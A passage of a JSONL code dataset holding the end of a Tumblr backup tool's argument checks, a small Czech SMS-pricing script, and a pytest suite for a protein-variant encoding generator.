must not be negative')\n if options.outdir and len(blogs) > 1:\n parser.error(\"-O can only be used for a single blog-name\")\n if options.dirs and options.tag_index:\n parser.error(\"-D cannot be used with --tag-index\")\n if options.exif:\n if pyexiv2 is None:\n parser.error(\"--exif: module 'pyexiv2' is not installed\")\n if not hasattr(pyexiv2, 'ImageMetadata'):\n parser.error(\"--exif: module 'pyexiv2' is missing features, perhaps you need 'py3exiv2'?\")\n if options.save_video and not youtube_dl:\n parser.error(\"--save-video: module 'youtube_dl' is not installed\")\n if options.cookiefile is not None and not os.access(options.cookiefile, os.R_OK):\n parser.error('--cookiefile: file cannot be read')\n if options.save_notes:\n if BeautifulSoup is None:\n parser.error(\"--save-notes: module 'bs4' is not installed\")\n import note_scraper\n if options.copy_notes:\n if not options.prev_archives:\n parser.error('--copy-notes requires --prev-archives')\n if BeautifulSoup is None:\n parser.error(\"--copy-notes: module 'bs4' is not installed\")\n if options.notes_limit is not None:\n if not options.save_notes:\n parser.error('--notes-limit requires --save-notes')\n if options.notes_limit < 1:\n parser.error('--notes-limit: Value must be at least 1')\n if options.filter is not None:\n if jq is None:\n parser.error(\"--filter: module 'jq' is not installed\")\n options.filter = jq.compile(options.filter)\n if options.prev_archives:\n if scandir is None:\n parser.error(\"--prev-archives: Python is less than 3.5 and module 'scandir' is not installed\")\n if len(options.prev_archives) != len(blogs):\n parser.error('--prev-archives: expected {} directories, got {}'.format(\n len(blogs), len(options.prev_archives),\n ))\n for blog, pa in zip(blogs, options.prev_archives):\n if not os.access(pa, os.R_OK | os.X_OK):\n parser.error(\"--prev-archives: directory '{}' cannot be read\".format(pa))\n blogdir = os.curdir if options.blosxom else (options.outdir or blog)\n if os.path.realpath(pa) == os.path.realpath(blogdir):\n parser.error(\"--prev-archives: Directory '{}' is also being written to. Use --reuse-json instead if \"\n \"you want this, or specify --outdir if you don't.\".format(pa))\n\n if not API_KEY:\n sys.stderr.write('''\\\nMissing API_KEY; please get your own API key at\nhttps://www.tumblr.com/oauth/apps\\n''')\n sys.exit(1)\n\n ApiParser.setup()\n tb = TumblrBackup()\n try:\n for i, account in enumerate(blogs):\n logger.backup_account = account\n tb.backup(account, options.prev_archives[i] if options.prev_archives else None)\n except KeyboardInterrupt:\n sys.exit(EXIT_INTERRUPT)\n\n if tb.failed_blogs:\n logger.warn('Failed to back up {}'.format(', '.join(tb.failed_blogs)))\n sys.exit(tb.exit_code())\n","repo_name":"katekate1988/tumblr-utils","sub_path":"tumblr_backup.py","file_name":"tumblr_backup.py","file_ext":"py","file_size_in_byte":73564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"4673308293","text":"def cislo(tel_cislo):\n if len(tel_cislo) == 13 and tel_cislo[0:4] == '+420' or len(tel_cislo) == 9:\n tel_cislo = True\n return tel_cislo\n else:\n tel_cislo = False\n print('Zadal jsi špatné číslo.')\n return tel_cislo\n\nzadane_cislo=input('Zadej číslo: ').replace(\" \",\"\")\novereni_cisla = cislo(zadane_cislo)\n\nif overeni_cisla:\n def text(text_zpravy):\n cena_sms = ((len(text_zpravy) // 180) + 1) * 3\n return cena_sms\n zadana_zprava = input('Zadej znění zprávy: ')\n cena = text(zadana_zprava)\n print(f'Cena SMS je {cena} Kč. ')","repo_name":"adelakrejbychova/python-2022","sub_path":"sms_brana.py","file_name":"sms_brana.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13426285941","text":"\"\"\"\nThis file contains functions that test the functionality of MLDE/Support/Encode/EncodingGenerator.py\n\"\"\"\n# Import necessary modules\nimport pytest\nimport time\nimport os\nimport shutil\nimport pickle\nimport subprocess\nimport numpy as np\nfrom itertools import product\nfrom Bio import SeqIO\n\n# Import the encoding generator\nfrom Support.Encode.EncodingGenerator import EncodingGenerator\nfrom Support.Encode.MolBioInfo import all_aas\nfrom Support.Encode.TapeModelLocations import tape_model_locations\nfrom Support.Encode.GeorgievParams import georgiev_parameters\n\n# Define the location of the test output folder\ntest_output_folder = \"./Validation/pytest/Encode/TestOutput\"\n\n# Define allowed learned encodings\nallowed_all = (\"onehot\", \"georgiev\", \"resnet\", \"bepler\", \"unirep\", \"transformer\", \"lstm\")\nallowed_learned = (\"resnet\", \"bepler\", \"unirep\", \"transformer\", \"lstm\")\n\n# Write a function that compares encoder properties\ndef compare_encoder_properties(encoder1, encoder2):\n \n # Assert properties are the same where reasonable\n assert encoder1.n_positions_combined == encoder2.n_positions_combined\n assert encoder1.combi_space == encoder2.combi_space\n assert all(combo1 == combo2 for combo1, combo2 in\n zip(encoder1.all_combos, encoder2.all_combos))\n assert encoder1.index_to_combo == encoder2.index_to_combo\n\n# Define a function that tests _normalize_encodings()\ndef test_normalize_encodings():\n \"\"\"\n This function simply tests where things passed in to _normalize_encodings\n will be correctly normalized.\n \"\"\" \n # Import function to test\n from Support.Encode.EncodingGenerator import _normalize_encodings\n \n # We expect an error if the incorrect shape is passed in\n with pytest.raises(AssertionError):\n _normalize_encodings(np.random.rand(1000, 10))\n \n # Now define an input array and what we expect it to be coming out\n test_input = np.random.rand(1000, 7, 100)\n \n # Get the latter dimensions\n flat_test = np.empty([1000, 700])\n for i in range(1000):\n filler = []\n for row in test_input[i]:\n filler.extend(row)\n flat_test[i] = filler\n \n # Get means and standard deviations\n means = np.array([np.mean(flat_test[:, i]) for i in range(700)])\n stdevs = np.array([np.std(flat_test[:, i]) for i in range(700)])\n \n # Mean center and unit-scale\n center_scaled = np.array([(flat_test[:, i] - means[i])/stdevs[i]\n for i in range(700)]).T\n \n # Reshape\n test_output = np.array([[center_scaled[i][j: j+100] for j in range(0, 700, 100)]\n for i in range(1000)])\n \n # Assert all close\n assert np.allclose(test_output, _normalize_encodings(test_input))\n \n# This function checks the initialization stage of the EncodingGenerator\ndef test_EncodingGenerator_init():\n \"\"\"\n This function will...\n 1. Test to be sure we behave correctly under different circumstances: If learned\n encodings are used, then we should go through more checks (two other functions)\n than if georgiev or onehot are used. All should still achieve the same \n final variables, however; an incorrect encoding should be reported as an error\n 2. Make sure that learned encodings require target protein indices\n 3. Make sure that onehot and georgiev require n_positions_combined\n 4. Make sure an error is thrown if we have an unknown encoding\n \"\"\"\n\n # Make sure errors are thrown if we don't have the correct variables for each encoding\n with pytest.raises(AssertionError, match = \"Did not define n_positions_combined\"):\n _ = EncodingGenerator(\"georgiev\", \"test\",\n output = test_output_folder)\n with pytest.raises(AssertionError, match = \"Did not define n_positions_combined\"):\n _ = EncodingGenerator(\"onehot\", \"test\",\n output = test_output_folder)\n \n # Loop over all embeddings and make sure we throw an error if we did not pass\n # in the correct arguments\n for encoding in allowed_learned:\n with pytest.raises(AssertionError, match = \"Did not define target indices\"):\n _ = EncodingGenerator(encoding, \"test\",\n output = test_output_folder)\n \n # Make sure there is an error if we pass in an unknown encoding\n with pytest.raises(AssertionError, match = \"Unknown encoding\"):\n _ = EncodingGenerator(\"alkdjfhlaksdf\", \"test\",\n output = test_output_folder)\n \n # Define objects for the unlearned encodings\n georgiev_obj = EncodingGenerator(\"georgiev\", \"test\", n_positions_combined = 3,\n output = test_output_folder)\n time.sleep(1)\n onehot_obj = EncodingGenerator(\"onehot\", \"test\", n_positions_combined = 3,\n output = test_output_folder)\n compare_encoder_properties(georgiev_obj, onehot_obj)\n \n # Make sure the variables are the size we expect\n assert georgiev_obj.n_positions_combined == 3\n assert georgiev_obj.combi_space == 8000\n \n # Define objects for the learned encodings and make sure we arrive at the \n # same variables as with georgiev and onehot encodings\n for encoding in allowed_learned:\n \n # Make the learned embedding object\n time.sleep(1)\n learned_obj = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n \n # Make sure the embedding object has the same variables as the georgiev one\n compare_encoder_properties(learned_obj, georgiev_obj)\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function that tests _process_input_fasta\ndef test_process_input_fasta():\n \"\"\"\n This function only applies for learned embeddings. The test will...\n 1. Make sure all assertion errors in the process function are raised when\n appropriate\n 2. Confirm that we get back the expected protein sequence\n \"\"\"\n # Loop over all allowed embeddings\n for encoding in allowed_learned:\n \n # Make sure that we have an error if we can't find a file\n with pytest.raises(IOError, match = \"Cannot locate './Validation/pytest/Encode/TestData/Dud.fasta'\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/Dud.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n time.sleep(1)\n \n # Make sure we have an error if the fasta file has two sequences\n with pytest.raises(AssertionError, match = \"Embedding generator can currently only handle 1 parent sequence\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta2Seqs.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n time.sleep(1)\n \n # Make sure we have an error if we have forbidden characters\n with pytest.raises(AssertionError, match = \"Forbidden character in input sequence.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFastaForbiddenCharacters.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n time.sleep(1)\n \n # Make sure the output sequence is correct\n embedding_obj = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = (\"Q5\", \"L10\", \"G19\"))\n assert embedding_obj.wt_seq == \"VAFYQSTGHLMNDDDAAGGLIMNPPQDE\"\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function that tests _check_indices()\ndef test_check_indices():\n \"\"\"\n This function checks the below:\n 1. The index_splitter correctly splits amino acid positions and letters\n 2. The index_splitter throws an error if the input format is wrong\n 3. The correct python indices are generated from the input protein indices\n 4. If amino acid names don't match up, we throw an error\n 5. The correct wild type amino acids are pulled\n 6. Throw an error if indices are not pased in in order\n 7. Throw an error if duplicate indices are passed in\n \"\"\"\n # Define the target indices and expected outputs\n expected_aas = (\"Q\", \"L\", \"G\")\n expected_python_inds = (4, 9, 18)\n expected_protein_inds = (\"Q5\", \"L10\", \"G19\")\n \n # Make some bad inputs\n bad_in1 = (\"5Q\", \"10L\", \"19G\")\n bad_in2 = (\"Q5\", \"10L\", \"19G\")\n bad_in3 = (\"Q_5\", \"L_10\", \"G_19\")\n \n bad_in4 = (\"A5\", \"L10\", \"G19\")\n bad_in5 = (\"Q5\", \"D10\", \"G19\")\n bad_in6 = (\"Q5\", \"L10\", \"Z19\")\n bad_in7 = (\"A5\", \"D10\", \"E19\")\n \n bad_in8 = (\"L10\", \"Q5\", \"G19\")\n bad_in9 = (\"G19\", \"L10\", \"Q5\")\n \n bad_in10 = (\"Q5\", \"Q5\", \"G19\")\n bad_in11 = (\"Q5\", \"Q5\", \"Q5\")\n \n # Loop over all embeddings\n for encoding in allowed_learned: \n \n # Build an Embedding object\n embedding_obj = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = expected_protein_inds)\n time.sleep(1)\n \n # Make sure we correctly split amino acids\n assert all((aa == expected_aas[i] and ind == expected_python_inds[i] and pind == expected_protein_inds[i])\n for i, (aa, ind, pind) in enumerate(zip(embedding_obj.wt_aas, embedding_obj.target_python_inds,\n embedding_obj.target_protein_indices)))\n \n # Make sure we throw an error if the input format is wrong\n for bad_in in (bad_in1, bad_in2, bad_in3):\n with pytest.raises(AssertionError, match = \"Unrecognizable protein index.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Make sure an error is thrown if the amino acid identities don't match\n # with the expected\n for bad_in in (bad_in4, bad_in5, bad_in6, bad_in7):\n with pytest.raises(AssertionError, match = \"Requested positions not found.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Now make sure we throw an error if amino acid indices aren't passed in\n # in order\n for bad_in in (bad_in8, bad_in9):\n with pytest.raises(AssertionError, match = \"Out of order indices.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Now make sure we throw an error if there are duplicates indices found\n for bad_in in (bad_in10, bad_in11):\n with pytest.raises(AssertionError, match = \"Duplicate indices identified.\"):\n EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = bad_in)\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function that tests build_combo_dicts\ndef test_build_combo_dicts():\n \"\"\"\n This function makes sure that the combo_to_index and index_to_combo dictionaries\n generated and saved during initialization are accurate\n \"\"\"\n # Make sure all_aas is the right length\n assert len(set(all_aas)) == 20\n \n # Design a set of all possible combinations for 2, 3 and 4 site libraries\n lib_sizes = (2, 3, 4)\n expected_lengths = (400, 8000, 160000)\n \n # Loop over possible library sizes\n for lib_ind, lib_size in enumerate(lib_sizes):\n \n # Generate a test library\n test_lib = list(product(all_aas, repeat=lib_size))\n \n # Loop over all encodings\n for encoding in allowed_all:\n \n # Make the encoder\n encoder = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = (\"A2\", \"Q5\", \"L10\", \"G19\")[:lib_size],\n n_positions_combined = lib_size)\n time.sleep(1)\n \n # Load the index to combo and combo to index dictionaries\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_ComboToIndex.pkl\"), \"rb\") as f:\n combo_to_ind = pickle.load(f)\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_IndexToCombo.pkl\"), \"rb\") as f:\n ind_to_combo = pickle.load(f)\n \n # Make sure the dictionaries are in agreement\n assert all(ind_to_combo[val] == key for key, val in combo_to_ind.items())\n \n # Make sure the lengths of everything is as expected\n assert len(test_lib) == expected_lengths[lib_ind]\n assert len(test_lib) == len(ind_to_combo)\n assert len(test_lib) == len(combo_to_ind)\n assert len(test_lib) == len(encoder.all_combos)\n \n # Make sure our test library and the all_combos libraries align\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(test_lib))\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(encoder.all_combos))\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n\n# Write a function to be sure we are correctly making fastas\ndef test_make_fastas():\n \"\"\"\n This function tests...\n 1. To be sure that the correct mutations are made in the correct locations\n of the wild type sequence for fasta files of different library sizes\n 2. To be sure that batching is being performed appropriately and we are not\n either cutting out sequences or adding sequences\n 3. To be sure that the combo_to_index and index_to_combo dictionaries\n generated and saved during initialization are accurate\n \"\"\"\n # Design a set of all possible combinations for 2, 3 and 4 site libraries\n lib_sizes = (2, 3, 4)\n expected_lengths = (400, 8000, 160000)\n \n # Defie a number of different batch sizes (making them awkard on purpose)\n batch_sizes = (1, 3, 4, 5, 7, 10, 13, 59)\n \n # Define the positions to mutate\n mutated_positions = (\"A2\", \"Q5\", \"L10\", \"G19\")\n expected_mut_inds = (1, 4, 9, 18)\n \n # Loop over possible library sizes\n for lib_ind, lib_size in enumerate(lib_sizes):\n \n # Generate a test library\n test_lib = list(product(all_aas, repeat=lib_size))\n \n # Loop over all encodings\n for encoding in allowed_all:\n \n # Loop over batch sizes\n for batch_size in batch_sizes:\n \n # Make the encoder\n encoder = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = mutated_positions[:lib_size],\n n_positions_combined=lib_size)\n time.sleep(1)\n \n # Load the index to combo and combo to index dictionaries\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_ComboToIndex.pkl\"), \"rb\") as f:\n combo_to_ind = pickle.load(f)\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_IndexToCombo.pkl\"), \"rb\") as f:\n ind_to_combo = pickle.load(f)\n \n # Make sure the dictionaries are in agreement\n assert all(ind_to_combo[val] == key for key, val in combo_to_ind.items())\n \n # Make sure the lengths of everything is as expected\n assert len(set(test_lib)) == expected_lengths[lib_ind]\n assert len(test_lib) == len(ind_to_combo)\n assert len(test_lib) == len(combo_to_ind)\n assert set(test_lib) == set(encoder.all_combos)\n \n # Make sure our test library and the all_combos libraries align\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(test_lib))\n assert all(ind_to_combo[i] == \"\".join(combo) for i, combo in enumerate(encoder.all_combos))\n \n # If this is a georgiev or onehot encoding, continue from here\n if encoding in {\"onehot\", \"georgiev\"}:\n continue\n \n # Make fastas\n fasta_files = encoder._build_fastas(batch_size)\n \n # Now load all fasta files\n mutated_seqs = []\n for fasta_file in fasta_files:\n \n # Load the fasta file\n with open(fasta_file, \"r\") as f:\n \n # Open the fasta file and extract all sequences\n fasta_seqs = list(SeqIO.parse(f, \"fasta\"))\n \n # Convert the full sequence to uppercase and record\n mutated_seqs.extend([str(seq.seq) for seq in fasta_seqs])\n \n # Make sure the length is as expected\n assert len(mutated_seqs) == expected_lengths[lib_ind]\n \n # Loop over the sequences and make sure the amino acids match\n # the combinations\n for seqid, seq in enumerate(mutated_seqs):\n \n # Pull the amino acids at the correct sequence positions\n mutated_aas = [seq[ind] for ind in expected_mut_inds[:lib_size]]\n \n # Make sure the mutated_aas match the combination expected\n assert all(mutant_aa == expected_aa for mutant_aa, expected_aa\n in zip(encoder.all_combos[seqid], mutated_aas))\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)\n \n# Test the generate_encodings function\ndef test_generate_encodings():\n \"\"\"\n This is a beefy test function. Using it, we test the functions:\n 1. _generate_onehot()\n 2. _generate_georgiev()\n 3. _generate_learned()\n \n This function is tested last because it relies on all of the preceding functions\n working. For each of the above encoding functions, we test whether the encodings \n we get from a subset of all encodings align with what we would have arrived\n at performing encoding manually (or as close to it as we can for the learned\n embeddings)? This relies pulling the expected index of the encoding using \n the appropriate dictionaries. We also test to be sure there are no duplicate\n encodings in the returned arrays. All of these tests are performed over multiple\n batch sizes, but only for libraries of size 2 and 3 (For the sake of compute time) \n \"\"\"\n # Design a set of all possible combinations for 2 and 3 site libraries\n lib_sizes = (2, 3)\n expected_lengths = (400, 8000)\n \n # Defie a number of different batch sizes (making them awkard on purpose)\n batch_sizes = (1, 3, 4, 13, 59)\n \n # Define the expected shapes\n expected_shapes = {\"onehot\": 20,\n \"georgiev\": 19,\n \"resnet\": 256,\n \"bepler\": 100,\n \"unirep\": 1900,\n \"transformer\": 512,\n \"lstm\": 2048}\n \n # Define the positions to mutate\n mutated_positions = (\"A2\", \"Q5\", \"G19\")\n expected_mut_inds = (1, 4, 18)\n \n # Define the variants that we will test\n tested_vars = (\"ADQ\", \"GHI\", \"WYD\", \"IFK\", \"PRS\")\n \n # Define the expected onehot encodings\n expected_onehot = np.array([\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\n ],\n [\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ],\n [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]\n ]\n ])\n \n # Define the expected Georgiev arrays\n expected_georgiev = np.empty([10, 3, 19])\n for i, combo in enumerate(tested_vars):\n for j, char in enumerate(combo):\n for k, param in enumerate(georgiev_parameters):\n expected_georgiev[i, j, k] = param[char]\n expected_georgiev[i + 5, j, k] = param[char]\n \n # Get the location of the fasta containing the test variants\n test_fasta = \"./Validation/pytest/Encode/TestData/DummyFastaEmbeddingTest.fasta\"\n \n # Define a dictionary for storing expected embedding results\n expected_results = {\"onehot\": expected_onehot,\n \"georgiev\": expected_georgiev}\n \n # Run tape for all models using the test variants\n for encoding in allowed_learned:\n \n # Get the save location\n save_loc = f\"./Validation/pytest/Encode/TestData/EncodingOutput/{encoding}.pkl\"\n \n # Run tape\n _ = subprocess.run([\"tape-embed\", test_fasta,\n encoding, \"--load-from\", tape_model_locations[encoding],\n \"--output\", save_loc])\n \n # Load results and store\n with open(save_loc, \"rb\") as f:\n tape_results = pickle.load(f)\n \n # Store results\n expected_learned = np.empty([len(tested_vars) * 2, 3, expected_shapes[encoding]])\n for i, result in enumerate(tape_results):\n for j, expected_mut_ind in enumerate(expected_mut_inds):\n expected_learned[i, j] = result[0, expected_mut_ind]\n expected_results[encoding] = expected_learned\n \n # Loop over possible library sizes\n for lib_ind, lib_size in enumerate(lib_sizes):\n \n # Generate a test library\n test_lib = list(product(all_aas, repeat=lib_size))\n \n # Get the back range of expected results\n if lib_size == 2:\n expected_results_range = np.arange(0, 5)\n else:\n expected_results_range = np.arange(5, 10)\n \n # Loop over all encodings\n for encoding in allowed_all:\n \n # Loop over batch sizes\n for batch_size in batch_sizes:\n \n # Make the encoder\n encoder = EncodingGenerator(encoding, \"test\", output = test_output_folder,\n fasta_path = \"./Validation/pytest/Encode/TestData/DummyFasta.fasta\",\n target_protein_indices = mutated_positions[:lib_size],\n n_positions_combined=lib_size)\n encoder.generate_encodings(n_batches=batch_size)\n time.sleep(1)\n \n # Load the index to combo and combo to index dictionaries\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_ComboToIndex.pkl\"), \"rb\") as f:\n combo_to_ind = pickle.load(f)\n with open(os.path.join(encoder.encoding_output, f\"test_{encoding}_IndexToCombo.pkl\"), \"rb\") as f:\n ind_to_combo = pickle.load(f)\n \n # Make sure that the lengths fo combo to ind and ind to combo are accurate\n assert len(combo_to_ind) == expected_lengths[lib_ind]\n assert len(ind_to_combo) == expected_lengths[lib_ind]\n \n # Make sure the test library is the same as the actual library\n assert [test_combo == actual_combo for test_combo, actual_combo\n in zip(test_lib, encoder.all_combos)]\n assert len(test_lib) == len(encoder.all_combos)\n assert len(set(encoder.all_combos)) == len(encoder.all_combos)\n assert len(set(encoder.all_combos)) == expected_lengths[lib_ind]\n \n # Make sure that combo_to_ind and ind_to_combo are equivalent\n assert all(combo_to_ind[val] == key for key, val in ind_to_combo.items())\n \n # Load the unnormalized encodings \n unnorm_encodings = np.load(os.path.join(encoder.encoding_output, \n f\"{encoder.protein_name}_{encoder.encoding}_UnNormalized.npy\"))\n \n # Make sure that the shape of the encodings is what we expect\n assert (unnorm_encodings.shape == (expected_lengths[lib_ind], \n lib_size,\n expected_shapes[encoding]))\n \n # Find the indices for test combinations\n test_comb_inds = np.array([combo_to_ind[combo[:lib_size]]\n for combo in tested_vars])\n \n # Make sure that the expected and actual results are equivalent\n assert np.array_equal(unnorm_encodings[test_comb_inds], \n expected_results[encoding][expected_results_range, :lib_size])\n \n # Get the flat unnormalized encodings\n flat_unnorm = np.reshape(unnorm_encodings, \n [len(unnorm_encodings), \n np.product(unnorm_encodings.shape[1:])])\n \n # Make sure every row is unique\n assert len(flat_unnorm) == len(np.unique(flat_unnorm, axis = 0))\n \n # If this is a onehot encoding, make sure all rows add up to the \n # number of positions in library. Make sure all columns add up to\n # the number of combinations / 20. Afterward, continue\n if encoding == \"onehot\":\n \n # Add across all rows and columns\n row_sum = flat_unnorm.sum(axis = 1)\n col_sum = flat_unnorm.sum(axis = 0)\n \n # Make sure the shapes of rows and columns are correct\n assert len(row_sum.shape) == 1\n assert len(col_sum.shape) == 1\n assert len(row_sum) == expected_lengths[lib_ind]\n assert len(col_sum) == lib_size * 20\n \n # Make sure the colums and rows have the appropriate additions\n assert np.all(row_sum == lib_size)\n assert np.all(col_sum == expected_lengths[lib_ind] / 20)\n \n continue\n \n # Load the normalized encodings\n norm_encodings = np.load(os.path.join(encoder.encoding_output, \n f\"{encoder.protein_name}_{encoder.encoding}_Normalized.npy\"))\n \n # Make sure the shape is what we expect\n assert norm_encodings.shape == unnorm_encodings.shape\n \n # Make sure the array is different from the unnormalized encodings\n assert not np.array_equal(norm_encodings, unnorm_encodings)\n \n # Now make sure that we are unit-scaled, mean-centered\n flat_norm = np.reshape(norm_encodings, \n [len(norm_encodings), \n np.product(norm_encodings.shape[1:])])\n test_mean = flat_norm.mean(axis=0)\n test_stdev = flat_norm.std(axis = 0)\n \n # Make sure all rows are unique\n assert len(flat_norm) == len(np.unique(flat_norm, axis = 0))\n \n # Make sure our mean and standard deviation vectors are the \n # expected length\n assert len(test_mean) == expected_shapes[encoding] * lib_size\n assert len(test_stdev) == expected_shapes[encoding] * lib_size\n \n # Make sure the mean is roughly 0 and the standard deviation is \n # roughly 1\n assert np.all(np.abs(test_mean) < 1e-2)\n assert np.all(np.abs(np.ones(len(test_stdev)) - test_stdev) < 1e-4)\n \n # Purge the test output folder\n shutil.rmtree(test_output_folder)","repo_name":"navneedh/mlde_AL","sub_path":"Validation/pytest/Encode/test_EncodingGenerator.py","file_name":"test_EncodingGenerator.py","file_ext":"py","file_size_in_byte":32168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
